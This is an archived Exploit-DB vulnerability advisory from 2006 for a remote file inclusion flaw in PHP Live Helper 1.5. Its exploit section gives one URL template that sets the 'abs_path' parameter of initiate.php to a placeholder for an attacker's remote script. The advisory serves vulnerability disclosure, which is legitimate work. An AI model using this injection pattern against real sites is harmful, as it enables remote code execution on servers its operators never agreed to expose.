PHP Live Helper 1.x - 'abs_path' Remote File Inclusion

EDB-ID:

1926

CVE:

N/A


Platform:

PHP

Published:

2006-06-18

---------------------------------------------------------------------------
PHP Live Helper <=([abs_path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By SnIpEr_SA
Author : SnIpEr_SA
Remote : Yes
Local : No
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHP Live Helper
version : 1.5 and last version
URL :http://www.live-helper.com/

------------------------------------------------------------------
Exploit:
~~~~~~~~

# http://www.site.com/[livehelperpath]/initiate.php?abs_path=[evil_scripts]

---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~

SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Frind
/*

-------------------------------- [ END ] ----------------------------------

# milw0rm.com [2006-06-18]